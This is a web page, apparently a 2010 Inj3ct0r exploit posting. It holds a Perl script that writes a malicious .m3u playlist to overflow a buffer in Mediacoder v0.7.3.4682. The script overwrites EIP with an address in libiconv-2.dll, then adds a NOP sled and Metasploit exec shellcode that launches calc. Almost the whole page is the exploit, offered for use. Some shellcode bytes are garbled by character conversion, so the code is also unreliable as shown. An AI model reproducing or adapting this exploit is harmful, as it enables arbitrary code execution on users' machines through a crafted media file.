Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit
====================================================================

#!/usr/bin/perl

###################################################################

#Exploit Title : Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit

#tested on windows xp SP 2 (FR)

#Date:24/07/2010

#download : http://www.dodownload.com/video+multimedia/play+video/mediacoder.html

#Author: s-dz [s-dz[at]HotmaiL.fr]

# Tjrs mahboul-3lik

###################################################################

$file= &quot;mahboul-3lik.m3u&quot;;

my $junk = &quot;x41&quot; x 256;

my $eip = pack(‘V’, 0×66086687);# libiconv-2.dll

my $nop =&quot;x90&quot;x 24;

# windows/exec

# http://www.metasploit.com

# EXITFUNC=thread, CMD=calc

my $sec =

&quot;xdbxc0×31xc9xbfx7cx16×70xccxd9×74x24xf4xb1&quot; .

&quot;x1ex58×31x78×18x83xe8xfcx03×78x68xf4×85x30&quot; .

&quot;x78xbcx65xc9×78xb6×23xf5xf3xb4xaex7dx02xaa&quot; .

&quot;x3ax32×1cxbfx62xedx1dx54xd5×66x29×21xe7×96&quot; .

&quot;x60xf5×71xcax06×35xf5×14xc7×7cxfbx1bx05×6b&quot; .

&quot;xf0×27xddx48xfdx22×38x1bxa2xe8xc3xf7×3bx7a&quot; .

&quot;xcfx4cx4fx23xd3×53xa4×57xf7xd8×3bx83×8ex83&quot; .

&quot;x1fx57×53x64×51xa1×33xcdxf5xc6xf5xc1×7ex98&quot; .

&quot;xf5xaaxf1×05xa8×26x99×3dx3bxc0xd9xfex51×61&quot; .

&quot;xb6×0ex2fx85×19x87xb7×78x2fx59×90x7bxd7×05&quot; .

&quot;x7fxe8×7bxca&quot;;

open($FILE, &quot;&gt;$file&quot;);

print($FILE $junk.$eip.$nop.$sec);

close($FILE);

print(&quot;exploit created successfully&quot;);

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-24]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13467